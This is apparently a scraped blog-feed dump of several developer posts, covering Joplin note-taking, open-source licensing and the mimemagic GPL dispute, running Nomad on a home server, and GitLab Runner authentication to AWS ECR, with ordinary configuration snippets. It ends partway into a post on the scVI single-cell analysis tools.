@shantanugoel who introduced me to Joplin. He’s a heavy user of it as well and that gave me some confidence to try it out. I initially disliked it because of not-so-great-looking UI theme and how it essentially looked just an editor. Admittedly, I was proven wrong quickly in my initial judgement. As I gave more time to it, I noticed I kept coming back to Joplin “naturally” and stuck through it because it’s so damn simple to use. Notion, for people who have tried it would know it complicates a lot of simple tasks. You need to create databases to render a simple table, every component is a “block” (a new page) and yes it’s slow (although they are working on it to make it better, just to be fair). Notion focuses a lot on team collaboration features, which I didn’t need for my “personal” note-taking system.\nTL;DR: Joplin is fast, it’s open-source, it’s based on Markdown, and it’s simple to use. A tool you just forget that it exists, because it becomes a natural extension to your workflow. It has a great plugin system that you can use to extend it and build your own utilities on top of it. The search is based on sqlite3 FTS which is pretty awesome!\nWorkflow#\nJoplin revolves around the concept of notebooks. Notebooks are broader categories for your content and you can nest multiple subnotebooks for specific categories.\nI’ve the following notebooks and subnotebooks in my Joplin setup:\n- Bookmarks\n  - Twitter Threads\n  - HN Threads\n  - Articles\n  - Design Inspo\n  - Youtube Videos\n- Inbox\n  - Links\n  - Adhoc Notes\n- Personal\n  - Finance\n  - Dev Setup\n  - OSS Ideas\n  - Self Hosted Setup\n- Work\n  - Org-Stuff\n  - Redacted\nOver the week, I primarily use the Inbox\u002FAdhoc Notes notebook as a brain dump. I don’t focus much on the structure, the aim is to get the content out and stored. I’m also someone who doesn’t like to keep more than 5 browser tabs open at any time, so I use Links notebook with Joplin’s Web Clipper service to store these links to read later.\nEvery weekend, I clean up these notebooks to achieve “Inbox Zero”. The idea is to move all these ad-hoc notes to their proper notebooks, annotated with tags. All the useful links are moved in the appropriate Bookmarks\u002F... notebook as well. This helps me find stuff quicker at a later time.\nI heavily use Tags in all my notebooks, which allows me to have a unified view of different kind of stuff I’ve. For example “golang” tag in my Work notes and Personal notes, allows me to see all the “golang” stuff together in one place.\nFor stuff that can be shared publicly, I basically copy-paste those notes in my public wiki as well. This allows me to share snippets\u002Fcommands with others, which Joplin cannot do.\nSynchronisation#\nJoplin provides a bunch of different sync options. I’ve tried Dropbox, Nextcloud and AWS S3 targets in the past but off late there’s a new sync option, Joplin Server which provides native sync for Joplin files. I found this option to be the best so far because Dropbox\u002FOneNote etc have API limits and syncing on an initial device with lots of notes will be time-consuming.\nI self-host this Joplin Sync Server on my server and have configured the Android app and the Desktop app to use this server endpoint as the sync target. So far so good, although it’s relatively a newer sync option so it’s pertinent to have alternate backups.\nBackups and Export#\nJoplin stores all the files locally on a device in a sqlite3 DB. It can export notes in markdown\u002FHTML format however the file names are all named with the id of the note (and not really the title of the note). I found this to be a bit of a drawback, however, one can quickly whip up a small Python script to fix this using the Joplin API.\nJoplin also has the option to export all of the notes and notebooks with their metadata (Geolocation, creation time etc), tags in a custom format called Joplin Export File (JEX). This option is pretty convenient to re-import in a new Joplin installation as well.\nSidenote for people using Joplin Server: Once https:\u002F\u002Fgithub.com\u002Flaurent22\u002Fjoplin\u002Fissues\u002F4836 gets resolved, it’ll be possible to do joplin sync and cron it, just like other sync targets.\nSupport#\nJoplin is 100% FOSS and is actively developed by @laurent22 and a few other regular contributors. I contribute $5\u002Fmo to laurent22 via Github Sponsors. It’s more or less the same amount that most note-taking apps charge for personal use as well, so this is just me expressing gratitude for building such a lovely software for the world to use it. I’m not sure of the motivations of laurent22 behind building this and I don’t wanna incorrectly assume anything either, but I guess some amount of financial incentive makes the whole deal sustainable for the open-source ecosystem.\nThanks for reading! It’s been around a year that I am using Joplin and I posted this blog post only after really really using it a lot.\nI’d love to know about your note-taking setups too, so please reach out to me on the usual channels that I’m available on and feel free to discuss!\nFin!\n(Bonus Section) Why Not Obsidian#\nYes, Obsidian is comparable to Joplin in a lot of ways. However there’s a term in the license of Obsidian for personal use that makes it impossible to use it for your work stuff:\nYou need to pay for Obsidian if and only if you use it for revenue-generating, work-related activities in a company that has two or more people. Get a commercial license for each user if that’s the case\nI don’t have a problem for “paying” for software but such kinda licenses are just BS.",[],{"slug":2101,"title":2102,"link":2103,"pubDate":2104,"contentSnippet":2105,"tags":2106,"maintainerName":1639,"maintainerUsername":1640,"maintainerPhoto":77,"feedUrl":1641},"intellectual-property-open-source-and-mimemagic-html","Intellectual property, Open source and mimemagic","https:\u002F\u002Faboobacker.in\u002F2021\u002F03\u002F28\u002Fintellectual-property-open-source-and-mimemagic.html","2021-03-28T18:47:00.000Z","The alleged GPL violation in a ruby library called mimemagic which broke builds of rails projects across the world brought discussion of Intellectual property in the software world one more time last week. It is important to have a general idea about these terms for a software developer to avoid getting into big troubles in the future.\nThis is my attempt to write down my understanding about open source and Intellectual property, I am not a lawyer and the implementation of IP is based on the local laws which is not universal.\nThough the modern concept of IP is originated from the exclusive access to rights and grants by the British monarch, it soon became a mechanism to promote the creation of intellectual goods, by giving the inventors some rights to the work they made.\nThough IP may sound an alien term, it is something critical for any company, for instance, company name, logo, design of the logo etc are trademarks which is a kind of intellectual property. This enables companies to protect reputation and goodwill of the brand by preventing others from copying same brand symbols to sell their products.\nContent produced by the company is protected by copyright, this also includes the software they made, in almost all legislations content produced is inherently owned by the author and protected by copyright, this prevents unauthorized access and redistribution of content by other people.\nAnother important intellectual property is patent which provides protection for innovative ideas, unlike copyright patent requires registration within a particular timeframe to the government agency. In general Patent protects ideas and copyright protects manifestation of that idea\nThere are other IPs like trade secrets which I am not covering here to limit the scope of the article.\nHistorically hardware was the most expensive piece of a computer and program or the software that runs on them wasn’t valued as important. But as more software distribution patterns emerged people started distributing just binaries of the software which prevented users from changing the software as per their needs. Richard R Stallman who was working in MIT lab during this period had a big trouble because of this, they used to adjust the printer firmware as per their need of paper size, But the new printer firmware came with just binary format which prevented from making the modification which caused wastage of papers they already had, Stallman requested the firmware owner to share the source code, but he refused.\nThat incident hit him big as usage of a computer owned by the user is dictated by the firmware owner. He believed this is a big ethical and social issue. He launched the GNU project in 1983 to create an operating system consisting of only free software. As per his own words the word free of “free” as in “free speech,” not as in “free beer”. Many including Linux followed this approach and many free software programs became available in the market.\nIn late 90s some people in industry realized the advantage of having free software in the enterprise world, i.e. when the code is shared more people can learn and adapt from it and there by saving time and cost. They also a coined a term called “Open Source” since people may easily interpret free software as free of cost software.\nWhile free softwares and open source softwares and practically largely the same, they are two movements with different motivations but almost the same path to achieve their goals. While free software movement is from the perspective of the user to have full control of his\u002Fher system, open source is from the perspective of software engineer or company to get benefit from shared source code.\nOpen source Initiative, which formalized the open source with 10 rules and listed software licenses compatible with these rules as open source licenses.\nBut why does an open source software need license?\nThe Answer is simple, as we discussed in the initial section, any content produced is owned by the author and others can’t redistribute without author’s permission. Licenses are contract from a software developer to  the user to share some of his\u002Fher\u002Ftheir rights to the user, In the case of open source it will be freedom to redistribute, make derived work etc. In other words open source licenses  Grants certain IP rights to users who are subject to license. This is different from EULA(End user license agreement) we see in the proprietary softwares which is to limit what the user can do with the software we purchased.\nAlso keep in mind that open source is not public domain which are the work which is not owned by anyone\nThere are many kinds of open source licenses ranging from permissive license which doesn’t ask the users anything more than attribution to copyleft licenses which mandate you to make your software of also open source if you use one in your software.\nI’ll be writing another article about commonly used licenses and things to be taken care of while using such licenses in another post, till then you can refer this awesome website.\nNow let’s go back to the incident that happened in the last week. freedesktop is a project on interoperability of free software projects, they maintain the list of mime types and is licensed under GPL. GPL is a very restrictive license and if you want to link your software to a GPLed software and distribute, then you will have to license your software with the same restrictions. In other words, you can’t directly link a  software linked with a gpled software\u002Fcode and distribute under proprietary or permissive open source license like MIT. The mimemagic gem which is MIT licensed used this GPLed code from freedesktop which is violation of GPL license. Initial fix to convert mimemagic license to GPL. But due to the nature of copyleft licenses, software which includes mimemagic will also have to comply GPL rules. So they later removed the GPLed file and made the library to use mime data from the user’s computer.\nThis may raise some questions about using GPL programs you use with your closed source(projects which are not open source) projects. First, you don’t have to care much about GPL in backend of software as service model like most websites does, as you are just distributing the output of the software, not the software itself to the end user, this is also called as saas loophole. Even if you aren’t, it is unlikely that mysql being part of your source code, if you are just mysql as database, you are using its SQL interface and not as part of your programs.\nNow let’s look at the common errors developers make due to lack of awareness about IP,\nCopy and paste snippets from stackoverflow (read more here).\nCopy open source code snippets from GitHub\nEven if the code is open source, some may require making your code also open source, some require attribution.\nCopy code snippets from GitHub or other publically available places\nIf you found some code on GitHub or any publically accessible places, you shouldn’t assume that code is open source unless license is explicitly given. For instance projects without explicit license in GitHub, all you can do is read the code and fork, you aren’t supposed to change the code\nForking open source projects without changing trademarks\nEven when the open source project is licensed under permissive open source license, it doesn’t grant you to use it’s trademark for redistribution. For example you can’t simply fork mysql and sell it as mysql\nOpen sourcing stuff without proper planning\nWhen you are open sourcing certain part of codebase, you must have a plan for what to do with the contributions, For instance when you release a component of your code base as open source and someone from community send a pull request and you merged to your repo, by default the person who contributed will have the copyright of the code, company can only use that code as per the license given in the repository. CLA Can be used as a workaround for this\nDo you have more examples? Feel free to comment below.\nWe covered the general IP concepts and it’s significanse in open source, I am not a lawyer and this blogpost is not a legal opinion. So talk to your lawyer before making legal decisons",[],{"slug":2108,"title":2109,"link":2110,"pubDate":2111,"contentSnippet":2112,"tags":2113,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"home-server-nomad","Running Nomad for home server","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fhome-server-nomad\u002F","2021-02-14T02:40:55.000Z","It’s been a long time since I’ve written a post on Hydra (my home server). I use Hydra as a testbed to learn new tools, workflows and it just gives me joy to self-host applications while learning something in return.\nHistory#\nA brief history of how Hydra’s setup evolved over time:\n2019:\nA pretty minimal K3s setup deployed on 2 RPi4 nodes. I couldn’t continue with this setup because:\n\nSome of the apps didn’t have ARM-based image (this was 2019, pre M1 hype era).\nDidn’t want to risk deploying persistent workloads on RPi.\nA lot of tooling to deploy workloads was missing (storing env variables for eg.).\nIt was so boring to write YAML (that I also did at work). Didn’t give me joy.\n2020 First Half:\nRPi 2x Nodes + K3s + DO Droplet. Tailscale for networking.\n\nThis was a considerable step up from the previous setup. I deployed a DO node and added Node Labels to deploy persistent workloads on DO Node only.\nI used my own tooling Kubekutr + Kustomize which helped with version control of my configs.\nTook quite a bit of time to onboard new services. Got lazy, didn’t host much apart from initial 3-4 applications.\nWriting long YAMLs. No joy.\n2020 Second Half:\nSingle node on DO. Terraform for deploying Docker containers.\n\nI believe the third iteration nailed it for me. I kept the setup super simple, used Terraform for deploying workloads as Docker containers.\nUsed Terraform extensively for setting up the node, Cloudflare records, DO firewall rules.\nTime to onboard new services reduced from a couple of hours to a few minutes. This was a huge win for me. I deployed around 10-15 new services to try it out on the server directly.\nWriting HCL is actually a much better experience than YAML.\nWhy Nomad#\n\nAround a month back, Kailash had asked about feedback on Nomad. We at Zerodha (India’s largest stock broker) are evaluating it to migrate our services to Nomad from Kubernetes (more on this later). It was almost 2 years since I last saw Nomad so it was definitely worth re-evaluating (esp since it hit 1.0 recently). I wanted to try out Nomad to answer a personal curiosity: What does it do differently than Kubernetes? No better way than actually getting hands dirty, right?!\nAfter following the brief tutorials from the official website I felt confident to try it for actual workloads. In my previous setup, I was hosting quite a few applications (Pihole, Gitea, Grafana etc) and thought it’ll be a nice way to learn how Nomad works by deploying the same services in the Nomad cluster. And I came in with zero expectations, I already had a nice setup which was reliable and running for me. My experience with a local Nomad cluster was joyful, I was able to quickly go from 0->1 in less than 30 minutes. This BTW is a strong sign of how easy Nomad is to get started with as compared to K8s. The sheer amount of different concepts you’ve to register in your mind before you can even deploy a single container in a K8s cluster is bizarre. Nomad takes the easy way out here and simplified the concepts for developers into just three things:\njob\n  \\_ group\n        \\_ task\nJob: Job is a collection of different groups. Job is where the constraints for type of scheduler, update strategies and ACL is placed.\nGroup: Group is a collection of different tasks. A group is always executed on the same Nomad client node. You’ll want to use Groups for use-cases like a logging sidecar, reverse proxies etc.\nTask: Atomic unit of work. A task in Nomad can be running a container\u002Fbinary\u002FJava VM etc, defining the mount points, env variables, ports to be exposed etc.\nIf you’re coming from K8s you can think of Task as a Pod and Group as a Replicaset. There’s no equivalent to Job in K8s. BUT! The coolest part? You don’t have to familiarise yourself with all different types of Replicasets (Deployments, Daemonsets, Statefulsets) and different ways of configuring them.\nWant to make a normal job as a periodic job in Nomad? Simply add the following block to your existing Job:\nperiodic {\n  cron = \"@daily\"\n}\nYou want to make a service run as a batch job (on all Nomad nodes – the equivalent of Daemonset in K8s)? Simply make the following change to your existing job:\n-type=\"service\"\n+type=\"batch\"\nYou see this is what I mean by the focus on UX. There are many many such examples which will leave a nice smile on your face if you’re coming from K8s background.\nI’d recommend reading Internal Architecture of Nomad if you want to understand this in-depth.\nArchitecture#\nTech stack for Hydra:\nTailscale VPN: Serves as a mesh layer between my laptop\u002Fmobile and DO server. Useful for exposing internal services.\nCaddy for reverse proxying and automatic SSL setup for all services. I run 2 instances of Caddy:\n\nInternal: Listens on Tailscale Network Interface. Reverse proxies all private services.\nPublic: Listens on DO’s Public IPv4 network interface. Reverse proxies all public-facing services.\nTerraform: Primary component to have IaC (Infra as Code). Modules to manage:\n\nCloudflare DNS Zone and Records\nDO Droplet, Firewall rules, SSH Keys, Floating IPs etc.\nNomad Jobs. Used for running workloads after templating env variables, config files in Nomad job files.\nComplexity of Nomad vs Kubernetes#\n\nNomad shines because it follows the UNIX philosophy of “Make each program do one thing well”. To put simply, Nomad is just a workload orchestrator. It only is concerned about things like Bin Packing, scheduling decisions.\nIf you’re running heterogeneous workloads, running a server (or a set of servers) quickly becomes expensive. Hence orchestrators tend to make sense in this context. They tend to save costs by making it efficient to run a vast variety of workloads. This is all an orchestrator has to do really.\nNomad doesn’t interfere in your DNS setup, Service Discovery, secrets management mechanisms and pretty much anything else. If you read some of the posts at Kubernetes Failure Stories, the most common reason for outages is Networking (DNS, ndots etc). A lot of marketing around K8s never talks about these things.\nI always maintain “Day 0 is easy, Day N is the real test of your skills”. Anyone can deploy a workload to a K8s cluster, it’s always the Day N operations which involve debugging networking drops, mysterious container restarts, proper resource allocations and other such complex issues that require real skills and effort. It’s not as easy as kubectl apply -f and my primary gripe is with people who miss out on this in their “marketing” pitches (obvious!).\nWhen to use Nomad#\nNomad hits the sweet spot of being operationally easy and functional. Nomad is a great choice if you want to:\nRun not just containers but other forms of workloads.\nIncrease developer productivity by making it easier to deploy\u002Fonboard new services.\nConsistent experience of deployment by testing the deployments locally.\n(Not joking) You are tired of running Helm charts or writing large YAML manifests. The config syntax for Nomad jobs is human friendly and easy to grasp.\nNomad is available as a single binary. If you want to try it locally, all you need is sudo nomad agent -dev and you’ll have a Nomad Server, Client running in dev mode along with a UI. This makes it easy for the developers to test out the deployments locally because there’s very little configuration difference between this and production deployment. Not to forget it’s super easy to self-host Nomad clusters. I’m yet to meet anyone who self hosts K8s clusters in production without a dedicated team babysitting it always.\nOnce you eliminate the “blackbox” components from your stack, life becomes easier for everyone.\nWhen to not use Nomad#\nIf you’re relying on custom controllers and operators. Operator Pattern is a new way of managing large complex distributed systems (like databases, job queues etc). There are a lot of community built operators which help in reducing the effort to run these services. However, all of these are tied deeply into the “Kubernetes” ecosystem. If you find yourself running any of such operators, it’ll be tough (not impossible) to translate the same in Nomad ecosystem.\nI genuinely cannot think of any other reason to not use Nomad!\nPractical Scenarios#\nSince I migrated a couple of workloads from my DO docker containers setup to Nomad, I’d demonstrate a few use cases which might be helpful if you want to start migrating your services to Nomad\nAccessing a Web service with Reverse Proxy#\nContext: I’m running Caddy as a reverse proxy for all the services. Since we discussed earlier, Nomad only is concerned about scheduling, so how exactly do you do Service Discovery? You need Consul (or something like Consul, Nomad has no hard restrictions) to register a service name with it’s IP Address. Here’s how you can do that:\nIn the .task section of your Nomad job spec, you need to register the service name with the port you’re registering and additional tags as metadata (optional):\nservice {\n  name = \"gitea-web\"\n  tags = [\"gitea\", \"web\"]\n  port = \"http\"\n}\nNomad’s template uses consul-template behind the scenes. This is a small utility which continuously watches for Consul\u002FVault keys and provides the ability to reload\u002Frestart your workloads if any of those keys change. It can also be used to discover the address of the service registered in Consul. So here’s an example of Caddyfile using Consul Template functions to pull the IP address of the upstream gitea-web service:\ngit.mrkaran.dev {\n    {{ range service \"gitea-web\" }}\n    reverse_proxy {{ .Address }}:{{ .Port }}\n    {{ end }}\n}\nWhen a job is submitted to Nomad, a rendered template is mounted inside the container. You can define actions on what to do when the values change. For eg on a redeployment of Gitea container, the address will most likely change. We’d like Caddy to automatically restart with the new address configured in the Caddyfile in that case:\ntemplate {\n  data = \u003C\u003CEOF\n${caddyfile_public}\nEOF\n\n  destination = \"configs\u002FCaddyfile\" # Rendered template.\n\n  change_mode = \"restart\"\n}\nUsing change_mode we can either send a signal or restart the task altogether.\nBinding to different network interfaces#\nI run a public instance of Gitea but I wanted to restrict the SSH access only to my Tailscale network. Nomad has an interesting feature host_network which lets you bind different ports of a task on different network interfaces.\nnetwork {\n  port \"http\" {\n    to = 3000\n  }\n\n  port \"ssh\" {\n    to = 22\n\n    # Need a static assignment for SSH ops.\n    static = 4222\n\n    # SSH port on the host only exposed to Tailscale IP.\n    host_network = \"tailscale\"\n  }\n}\nTemplating Env Variables#\nNOTE: This is not recommended for production.\nNomad doesn’t have any templating functionalities, so all the config must be sourced from Consul and secrets should be sourced from Vault. However in the time constraint I had, I wanted to understand Nomad and Consul better and use Vault at a later stage. I needed a way to interpolate the env variables. This is where Terraform comes into picture:\nresource \"nomad_job\" \"app\" {\n  jobspec = templatefile(\"${path.module}\u002Fconf\u002Fshynet.nomad\", {\n    shynet_django_secret_key   = var.shynet_django_secret_key,\n    shynet_postgresql_password = var.shynet_postgresql_password\n  })\n  hcl2 {\n    enabled = true\n  }\n}\nWe can pass the variables from Terraform (which can be sourced by TF_VAR_ in your local env) to the Nomad job spec. Inside the job spec we can use env to make it available to our task:\nenv {\n  DB_PASSWORD              = \"${shynet_postgresql_password}\"\n  DJANGO_SECRET_KEY        = \"${shynet_django_secret_key}\"\n}\nRunning a backup job on the host#\nI use restic to take periodic backups of my server and upload to Backblaze B2. Since Nomad supports running tasks as a different isolated environment (chroot) using exec driver and even without isolation using raw_exec driver, I wanted to give that a try. I’ve to resort using raw_exec driver here because \u002Fdata file path on my host was not available to the chroot’ed environment.\njob \"restic\" {\n  datacenters = [\"hydra\"]\n  type        = \"batch\"\n\n  periodic {\n    cron             = \"0 3 * * *\"\n    time_zone        = \"Asia\u002FKolkata\"\n    prohibit_overlap = true\n  }\n  ...\n  task \"backup\" {\n\t  driver = \"raw_exec\"\n\n\t  config {\n\t\t# Since `\u002Fdata` is owned by `root`, restic needs to be spawned as `root`. \n\n\t\t# `raw_exec` spawns the process with which `nomad` client is running (`root` i.e.).\n\t\tcommand = \"$${NOMAD_TASK_DIR}\u002Frestic_backup.sh\"\n\t  }\n  }\n  ...\n}\nYou can follow the rest of the config here.\nScope of Improvements#\nNomad has been an absolute joy to work with. However, I’ve spotted a few rough edge cases which I believe one should be aware of:\nhost_network property sometimes gets ignored when doing a modification to service. I’ve opened an issue upstream but looks like other people are facing similar behaviours here and here.\nhost_network as of present cannot bind to a floating IP address (DigitalOcean\u002FGCP etc). I’ve to resort to using my droplet’s public IPv4 address for now.\nI tried using Consul Connect (service mesh with mTLS) but looks like again because of host_network, I’m unable to use it.\nNomad CLI can definitely be improved for a much more consistent experience. I particularly missed using kubectl when using nomad.\nThat apart, I ended up sending a PR to upstream addressing a CLI arg ordering issue.\nGotchas:#\nOn a Nomad server already bootstrapped, if you try changing server.bind_addr, it won’t have any effect. I almost pulled my hair debugging this, ultimately deleting the data_dir of the server resolved the issue for me.\nI’m running DB and the App together as a single “group” in my setup configs. Don’t do this in production. Whenever you restart the job, the group will restart both the containers. The side effect of this is pretty interesting: Since we use Consul to fetch the DB Host, the app may start before the DB boots up and registers its new address with Consul. I will fix the dependency in a future version but since I’m running fewer workloads and there are automatic retries, it’s okay enough for me to keep it like this.\nCommunity#\nNomad’s community is pretty small compared to Kubernetes. However, the folks are super responsive on Gitter, Discourse and Github Issues. A few noteworthy mentions:\n@the-maldridge helped me with my doubts in Gitter.\n@tgross who is super responsive on Github issues and does an excellent job at housekeeping the issues.\n@shantanugadgil who is also pretty active in the community.\nNomad’s ecosystem is still in its nascent stage and I believe there are a lot of contribution opportunities for folks interested in Golang, Ops, Distributed Systems to contribute to Nomad. The codebase of Nomad is approachable and there are quite a few key areas which can be contributed to:\nDocs: More examples, practical use cases.\nNomad Job files: There are many helm charts available to follow best practices. Something similar in Nomad will definitely be interesting.\nNomad Gotchas: Since K8s is widely used and has a much larger adoption, it’s only natural that the failure stories of K8s are highlighted a lot. Nomad being a pretty smaller community, we need more debugging and “things that went wrong” reference materials. You learn more from failures than 101 setup guides :)\nFinal Thoughts#\nI think I’m sold on Nomad. I’ve used Kubernetes in prod for 2 years but if you were to ask me to write a Deployment spec from scratch (without Googling\u002Fkubectl help) I won’t be able to. After writing Nomad configs, I just can’t think of the sheer amount of boilerplate that K8s requires to get an application running.\nNomad is also a simpler piece to keep in your tech stack. Sometimes it’s best to keep things simple when you don’t really achieve any benefits from the complexity.\nNomad offers less than Kubernetes and it’s a feature, not a bug.\nFin!\nDiscussions#\nHackerNews\nLobster\nTwitter",[],{"slug":2115,"title":2116,"link":2117,"pubDate":2118,"contentSnippet":2119,"tags":2120,"maintainerName":202,"maintainerUsername":203,"maintainerPhoto":204,"feedUrl":205},"the-atmanirbhartha-of-open-source-software","The \"Atmanirbharta\" of open source software","https:\u002F\u002Fnadh.in\u002Fblog\u002Fthe-atmanirbhartha-of-open-source-software\u002F","Sat, 30 Jan 2021 00:00:00 +0000","In the Indian startup circles, Atmanirbhar (self-reliance) is the word of the year. Technology startups of all shapes and sizes, “unicorns” and non-unicorns have incorporated the tri colour and the Made in India label into their brand messaging and advertising campaigns—marketing prowess and valuations built on top of rapid innovation enabled by Free and Open Source Software (FOSS) created all over the world by countless programmers volunteering their time and effort writing code for everyone to solve problems and build enterprises. Linux, the quintessential example of FOSS, if quantified, would turn out to have created trillions of dollars in value for humanity.",[],{"slug":2122,"title":2123,"link":2124,"pubDate":2125,"contentSnippet":2126,"tags":2127,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"gitlab-runner-ecr","Setup Gitlab Runner with AWS ECR","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fgitlab-runner-ecr\u002F","2021-01-29T02:40:55.000Z","There are some things you expect to just work. Sadly trying to make Gitlab Runner with AWS ECR turned out to be quite a daunting task and the little documentation in this area doesn’t help. There’s even a 4 years old issue and everyone there is echoing the sentiment that this is unnecessarily a lot harder than it should have been.\nAnyway, since I spent a lot of time figuring out how to make a Private Registry work with a cross-account ECR, I’m documenting these steps hoping it’ll help someone someday :).\nThe Problem#\nThere are mainly 2 seemingly same but different problems when it comes to using ECR. Let’s discuss both of them separately:\nPulling a private image from ECR using the Docker Executor. For eg, if your gitlab-ci.yml looks like:\ntest-pull:\n  image: $PRIVATE_ECR_IMAGE\n  script:\n    - echo \"Hello World!\"\nIn this case, the Docker Executor needs to be “authenticated” to AWS ECR so that it can pull $PRIVATE_ECR_IMAGE.\nPulling a private image inside the job. For eg, if you’re using Kaniko:\ndocker-build:\n  image: gcr.io\u002Fkaniko-project\u002Fexecutor:debug\n  script:\n    - |\n      \u002Fkaniko ...\n      # Inside this step, we use a PRIVATE_ECR_IMAGE defined in our `Dockerfile`.\nIn this case, Kaniko needs to be “authenticated” to AWS ECR so that it can pull $PRIVATE_ECR_IMAGE.\nNOTE I prefer Kaniko over DIND as it is faster, doesn’t require running the privileged container, caching is simplified, and is in general a lot simpler to setup.\nThe Solution#\nSo, for the first case, where you want to authenticate the Docker Executor to AWS ECR, you’ll need 2 things:\nSetup DOCKER_AUTH_CONFIG environment variable to  { \"credsStore\": \"ecr-login\" } in the config.toml of the runner. For eg:\n[[runners]]\n  name = \"Test\"\n  url = \"https:\u002F\u002Fgitlab.internal\u002F\"\n  token = \"REDACTED\"\n  executor = \"docker\"\n  environment = [\"DOCKER_AUTH_CONFIG={ \\\"credsStore\\\": \\\"ecr-login\\\" }\"]\nNow, we’ve specified the Credential Store for Docker, but we don’t have this binary docker-credential-ecr-login in our runner. AWS provides amazon-ecr-credential-helper which is a neat way of automatically authenticating with AWS ECR based on your Access Keys\u002FIAM role. What does automatic mean here? So, the normal docker login is a basic auth command, where if you’ve to log in to ECR, you need to do something like:\naws ecr get-login-password --region region | docker login --username AWS --password-stdin aws_account_id.dkr.ecr.region.amazonaws.com\nThis is problematic because the authorization token is valid for 12 hours. Further, you’ve to log in to multiple registry IDs separately. Managing this is a nightmare, so Docker instead of just relying on Basic Auth, came up with a neat mechanism: docker-credential-helpers. This allows you to keep your secret tokens in your Keystore. A new credential helper can be written in Go which implements the credentials.Helper interface. This is what amazon-ecr-credential-helper does by offering various ways like AWS IAM Roles, Assumed Roles, Access Keys, etc to authenticate with ECR.\nThis is where I stumbled the most. I downloaded the binary from the Github Releases but this binary is statically compiled with muslc libraries.\nHowever gitlab\u002Fgitlab-runner is based on the ubuntu docker image, so the above binary never worked. The strangest thing was the unhelpful error message that sh returned as explained in this post.\nTo make things easier, I baked my own gitlab-runner image with the above binary compiled inside the image\nusing go get:\nFROM ubuntu:20.04 AS build\nENV DEBIAN_FRONTEND=noninteractive \nRUN : \\\n && apt-get update \\\n && apt-get install --no-install-recommends -y git golang-go ca-certificates \\\n && rm -rf \u002Fvar\u002Flib\u002Fapt\u002Flists\u002F* \\\n;\nRUN go get -u github.com\u002Fawslabs\u002Famazon-ecr-credential-helper\u002Fecr-login\u002Fcli\u002Fdocker-credential-ecr-login\nWORKDIR \u002Fbuild\nRUN mv \u002Froot\u002Fgo\u002Fbin\u002Fdocker-credential-ecr-login .\n\nFROM gitlab\u002Fgitlab-runner:v13.8.0 AS deploy\nCOPY --from=build \u002Fbuild\u002Fdocker-credential-ecr-login \u002Fusr\u002Flocal\u002Fbin\u002Fdocker-credential-ecr-login\nThe above image bakes in the docker-credential-ecr-login binary and also puts it under \u002Fusr\u002Flocal\u002Fbin so it’ll be available under $PATH to the Docker engine.\nWith the above 2 things, if the runner’s server (EC2 instance\u002FK8s pod) has access to the ECR image, it should be able to pull.\nNow coming to the 2nd problem, where we wanted kaniko to authenticate to ECR, things are a bit simpler:\nKaniko comes with docker-credential-ecr-login baked in. All you need to do is add the following to ~\u002F.docker\u002Fconfig.json as explained here.\n{ \"credsStore\": \"ecr-login\" }\nNext, we need to mount the AWS Credentials to Kaniko’s image so that it can use AWS SDK to perform a login to ECR. We do that by using volumes of the runner:\n[runners.docker]\nvolumes = [\"\u002Fhome\u002Fubuntu\u002Frunners\u002Ftest\u002Faws-credentials:\u002Froot\u002F.aws\u002Fcredentials:ro\"]\nThis mounts the aws-credentials file from the host inside the container which the runner spawned (kaniko in this case).\nA sample aws-credentials file if you’re using a cross-account access can look like:\n[default]\nrole_arn=arn:aws:iam::ACCOUNT_ID:role\u002Fassume-role-{{ROLE_NAME}}\ncredential_source=Ec2InstanceMetadata\nregion=ap-south-1\nYou can put in your normal AWS Keys or leave them blank if you want to use your IAM Role. With mounting the AWS Credentials inside Kaniko’s container, you can authenticate to cross-account ECRs as well (once you set up the whole assumed-role\u002Ftrusted entities flow).\nSample Runner#\nIf you want to take a look at how the complete flow looks like:\nStart the Runner service using docker-compose:\nversion: '3.7'\n\nservices:\n\n  test:\n    # As explained above, this image has `docker-credentials-ecr-login` baked in.\n    image: {{ACCOUNT_ID}.dkr.ecr.ap-south-1.amazonaws.com\u002Fcustom\u002Fgitlab-runner:13.8.0\n    restart: always\n    volumes:\n      # Automatically created; config.toml.\n      - '.\u002Ftest\u002Frunner-config:\u002Fetc\u002Fgitlab-runner'\n      # Mount AWS Credentials for Docker Executor to authenticate.\n      - '.\u002Ftest\u002Faws-credentials:\u002Froot\u002F.aws\u002Fcredentials:ro'\n      # Mount Docker Socket so that executor can communicate with it.\n      - '\u002Fvar\u002Frun\u002Fdocker.sock:\u002Fvar\u002Frun\u002Fdocker.sock'\nRegister a new runner:\ndocker-compose exec test register\nFill in the basic info and edit .\u002Ftest\u002Frunner-config.toml with the following options:\n[[runners]]\n  name = \"Test\"\n  executor = \"docker\"\n  environment = [\"DOCKER_AUTH_CONFIG={ \\\"credsStore\\\": \\\"ecr-login\\\" }\"]\n  [runners.docker]\n    volumes = [\"\u002Fhome\u002Fubuntu\u002Frunners\u002Ftest\u002Faws-credentials:\u002Froot\u002F.aws\u002Fcredentials:ro\"]\nConclusion#\nHonestly, this was a lot of trial and error to figure out how to use private images with Gitlab. Some important links and references that helped me figure this out:\nhttps:\u002F\u002Fgitlab.com\u002Fbmares\u002Fgitlab-runner-ecr-auth-example\u002F\nhttps:\u002F\u002Fgitlab.com\u002Fgitlab-org\u002Fgitlab-runner\u002F-\u002Fissues\u002F1583#note_84649153\nFin!",[],{"slug":2129,"title":2130,"link":2131,"pubDate":2132,"contentSnippet":2133,"tags":2134,"maintainerName":982,"maintainerUsername":983,"maintainerPhoto":984,"feedUrl":985},"scvi","Experiments with scVI","https:\u002F\u002Fsaket-choudhary.me\u002Fblog\u002F2020\u002F12\u002F27\u002Fscvi\u002F","2020-12-26T18:30:00.000Z","scvi-tools exists as a suite of tools for performing dimensionality reduction,\ndata harmonization, and differential expression. One key advantage of using scvi-tools\nis that it inherently supports loading and training data in mini-batches and hence\nis practically infinitely scalable (Lopez et al., 2018).\nscvi-tools uses generative modeling to model counts originating from a scRNA-seq experiment\nwith different underlying models catering to other experiments. “Generative modeling” is \na broad term that implies models of distributions  P(X)P(X)P(X) , defined over some collection of\ndatapoints  XXX  that exist in a high dimensional space. In scRNA-seq, each datapoint corresponds to a\ncell $c$ which has a multidimensional vector Xc,g∈R20000X_{c,g} \\in 